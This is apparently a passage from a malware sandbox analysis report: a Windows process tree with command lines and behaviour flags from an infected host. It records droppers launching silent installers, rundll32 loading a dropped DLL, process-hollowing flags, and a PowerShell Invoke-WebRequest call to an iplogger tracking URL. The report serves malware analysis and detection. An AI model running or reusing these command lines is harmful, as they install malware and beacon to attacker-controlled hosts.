C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5836 /prefetch:86⤵
-
Process tree (continued). Each entry gives the process depth in the tree, the image path, the full command line, and the behaviour flags recorded for that process.

[depth 6] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5836 /prefetch:8

[depth 6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:1

[depth 6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:1

[depth 6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:1

[depth 6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4624 /prefetch:1

[depth 6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4692 /prefetch:2

[depth 6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3120 /prefetch:1

[depth 6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:1

[depth 6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1

[depth 6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:1

[depth 6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1

[depth 6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1

[depth 6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1

[depth 6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4132 /prefetch:1

[depth 6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:1

[depth 6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1

[depth 6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3120 /prefetch:1

[depth 6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3980 /prefetch:1

[depth 6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6756 /prefetch:1

[depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad

[depth 6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcc8a346f8,0x7ffcc8a34708,0x7ffcc8a34718

[depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483

[depth 6] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcc8a346f8,0x7ffcc8a34708,0x7ffcc8a34718

[depth 4] C:\Users\Admin\AppData\Local\Temp\5f-7c819-343-3fcb8-06c9918c670bf\Qaraebubuly.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\5f-7c819-343-3fcb8-06c9918c670bf\Qaraebubuly.exe"

[depth 5] C:\Windows\System32\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hw4gjmq0.vjg\installer.exe /qn CAMPAIGN="654" & exit

[depth 6] C:\Users\Admin\AppData\Local\Temp\hw4gjmq0.vjg\installer.exe
    command line: C:\Users\Admin\AppData\Local\Temp\hw4gjmq0.vjg\installer.exe /qn CAMPAIGN="654"

[depth 5] C:\Windows\System32\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\voykcqjm.1qb\any.exe & exit

[depth 6] C:\Users\Admin\AppData\Local\Temp\voykcqjm.1qb\any.exe
    command line: C:\Users\Admin\AppData\Local\Temp\voykcqjm.1qb\any.exe

[depth 7] C:\Users\Admin\AppData\Local\Temp\voykcqjm.1qb\any.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\voykcqjm.1qb\any.exe" -u

[depth 5] C:\Windows\System32\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cg4kqisd.4ap\autosubplayer.exe /S & exit
    - Suspicious use of SetWindowsHookEx

[depth 4] C:\Program Files\Microsoft Office\DUAUIWDTOW\foldershare.exe
    command line: "C:\Program Files\Microsoft Office\DUAUIWDTOW\foldershare.exe" /VERYSILENT

[depth 1] C:\Windows\system32\rundll32.exe
    command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Process spawned unexpected child process

[depth 2] C:\Windows\SysWOW64\rundll32.exe
    command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

[depth 3] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 456
    - Drops file in Windows directory
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5192 -ip 5192
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4552 -ip 4552
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5028 -ip 5028

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3676 -ip 3676

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5452 -ip 5452

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 1100 -ip 1100
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 2216 -ip 2216
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1628 -ip 1628

[depth 1] C:\Windows\system32\WerFault.exe
    command line: C:\Windows\system32\WerFault.exe -pss -s 680 -p 6564 -ip 6564
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\system32\WerFault.exe
    command line: C:\Windows\system32\WerFault.exe -pss -s 552 -p 6580 -ip 6580
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\system32\WerFault.exe
    command line: C:\Windows\system32\WerFault.exe -pss -s 560 -p 7040 -ip 7040

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 7084 -ip 7084

[depth 1] C:\Windows\system32\WerFault.exe
    command line: C:\Windows\system32\WerFault.exe -pss -s 572 -p 5048 -ip 5048
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 3568 -ip 3568
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\system32\rundll32.exe
    command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Process spawned unexpected child process

[depth 2] C:\Windows\SysWOW64\rundll32.exe
    command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Loads dropped DLL

[depth 3] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 6812 -s 448
    - Program crash
    - Enumerates system info in registry

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6812 -ip 6812
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\System32\WaaSMedicAgent.exe
    command line: C:\Windows\System32\WaaSMedicAgent.exe fcb5a9b066a67e58a6b11c76f5aa06e9 PoCBdPX16U6ODzUp3gO8FQ.0.1.0.3.0
    - Modifies data under HKEY_USERS

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 5028 -ip 5028
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2616 -ip 2616
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5288 -ip 5288
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 2396 -ip 2396
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3532 -ip 3532
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 4056 -ip 4056
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3560 -ip 3560
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 6628 -ip 6628
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\system32\rundll32.exe
    command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Process spawned unexpected child process
    - Blocklisted process makes network request

[depth 1] C:\Users\Admin\AppData\Local\Temp\4BF9.exe
    command line: C:\Users\Admin\AppData\Local\Temp\4BF9.exe
    - Suspicious use of SetThreadContext

[depth 2] C:\Users\Admin\AppData\Local\Temp\4BF9.exe
    command line: C:\Users\Admin\AppData\Local\Temp\4BF9.exe
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 720 -ip 720

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 2192 -ip 2192
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Users\Admin\AppData\Local\Temp\AC5A.exe
    command line: C:\Users\Admin\AppData\Local\Temp\AC5A.exe
    - Suspicious use of SetThreadContext

[depth 2] C:\Users\Admin\AppData\Local\Temp\AC5A.exe
    command line: C:\Users\Admin\AppData\Local\Temp\AC5A.exe
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 3] C:\Users\Admin\AppData\Local\Temp\Done.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\Done.exe"
    - Loads dropped DLL

[depth 4] C:\Windows\SysWOW64\cmd.exe
    command line: "cmd" /c start "" "Ww.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1BHHn7"

[depth 5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    command line: powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1BHHn7"
    - Blocklisted process makes network request

[depth 5] C:\Users\Admin\AppData\Local\Temp\Ww.exe
    command line: "Ww.exe"
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 6] C:\Users\Admin\AppData\Local\Temp\srvs.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\srvs.exe"
    - Checks processor information in registry

[depth 7] C:\Windows\system32\WerFault.exe
    command line: C:\Windows\system32\WerFault.exe -u -p 18908 -s 1544
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

[depth 6] C:\Users\Admin\AppData\Local\Temp\rvs.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\rvs.exe"
    - Enumerates connected drives
    - Suspicious use of FindShellTrayWindow

[depth 7] C:\Windows\SysWOW64\msiexec.exe
    command line: "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\IOSoftware\WPSSE 2.3.4.2\install\WPSSE.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\rvs.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1636565878 "
    - Enumerates connected drives
    - Suspicious use of FindShellTrayWindow

[depth 3] C:\Users\Admin\AppData\Local\Temp\ganfarm.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\ganfarm.exe"
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext

[depth 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

[depth 4] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 12232 -s 564
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

[depth 3] C:\Users\Admin\AppData\Local\Temp\build.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\build.exe"
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext

[depth 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

[depth 4] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 12300 -s 564
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

[depth 3] C:\Users\Admin\AppData\Local\Temp\Radiophony.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\Radiophony.exe"
    - Suspicious use of SetThreadContext

[depth 4] C:\Users\Admin\AppData\Local\Temp\Radiophony.exe
    command line: C:\Users\Admin\AppData\Local\Temp\Radiophony.exe

[depth 1] C:\Windows\SysWOW64\rundll32.exe
    command line: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\xHTD~USV.J
    - Loads dropped DLL

[depth 1] C:\Users\Admin\AppData\Local\Temp\C292.exe
    command line: C:\Users\Admin\AppData\Local\Temp\C292.exe

[depth 2] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 8084 -s 296
    - Executes dropped EXE
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

[depth 1] C:\Windows\System32\CompPkgSrv.exe
    command line: C:\Windows\System32\CompPkgSrv.exe -Embedding

[depth 1] C:\Users\Admin\AppData\Local\Temp\E444.exe
    command line: C:\Users\Admin\AppData\Local\Temp\E444.exe
    - Suspicious use of SetThreadContext

[depth 2] C:\Users\Admin\AppData\Local\Temp\E444.exe
    command line: C:\Users\Admin\AppData\Local\Temp\E444.exe

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 8084 -ip 8084
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\system32\svchost.exe
    command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

[depth 1] C:\Users\Admin\AppData\Local\Temp\34D6.exe
    command line: C:\Users\Admin\AppData\Local\Temp\34D6.exe

[depth 2] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 8840 -s 280
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

[depth 1] C:\Windows\system32\msiexec.exe
    command line: C:\Windows\system32\msiexec.exe /V
    - Enumerates connected drives
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS

[depth 2] C:\Windows\syswow64\MsiExec.exe
    command line: C:\Windows\syswow64\MsiExec.exe -Embedding A3E1E283368842F4A8FE614CE691E1FB C
    - Loads dropped DLL

[depth 2] C:\Windows\syswow64\MsiExec.exe
    command line: C:\Windows\syswow64\MsiExec.exe -Embedding 984CA0998A54B15083DA285337D8A541
    - Blocklisted process makes network request
    - Loads dropped DLL

[depth 3] C:\Windows\SysWOW64\taskkill.exe
    command line: "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    - Kills process with taskkill

[depth 2] C:\Windows\syswow64\MsiExec.exe
    command line: C:\Windows\syswow64\MsiExec.exe -Embedding 1C31550BC3788DF43B8A428A881F4F36 E Global\MSI0000
    - Drops file in Windows directory

[depth 2] C:\Windows\syswow64\MsiExec.exe
    command line: C:\Windows\syswow64\MsiExec.exe -Embedding 73CA4C0E74DC6A35825A7433DE214A86 C

[depth 2] C:\Windows\syswow64\MsiExec.exe
    command line: C:\Windows\syswow64\MsiExec.exe -Embedding 9D1FB19C732C039566720A700C6E51C7 C

[depth 1] C:\Windows\system32\rundll32.exe
    command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Process spawned unexpected child process

[depth 2] C:\Windows\SysWOW64\rundll32.exe
    command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Loads dropped DLL

[depth 3] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 10244 -s 448
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 10244 -ip 10244
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Users\Admin\AppData\Local\Temp\947C.exe
    command line: C:\Users\Admin\AppData\Local\Temp\947C.exe

[depth 2] C:\Users\Admin\AppData\Roaming\WinSup\client32.exe
    command line: "C:\Users\Admin\AppData\Roaming\WinSup\client32.exe"
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 8840 -ip 8840
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Users\Admin\AppData\Local\Temp\D138.exe
    command line: C:\Users\Admin\AppData\Local\Temp\D138.exe
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 1] C:\Users\Admin\AppData\Local\Temp\D938.exe
    command line: C:\Users\Admin\AppData\Local\Temp\D938.exe

[depth 2] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 12040 -s 280
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

[depth 1] C:\Windows\system32\rundll32.exe
    command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Process spawned unexpected child process

[depth 2] C:\Windows\SysWOW64\rundll32.exe
    command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Loads dropped DLL

[depth 3] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 12316 -s 448
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 12316 -ip 12316
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\System32\svchost.exe
    command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 12300 -ip 12300
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 12232 -ip 12232
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 12040 -ip 12040
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\system32\rundll32.exe
    command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Process spawned unexpected child process

[depth 2] C:\Windows\SysWOW64\rundll32.exe
    command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

[depth 3] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 16516 -s 448
    - Program crash
    - Enumerates system info in registry

[depth 1] C:\Windows\SysWOW64\WerFault.exe
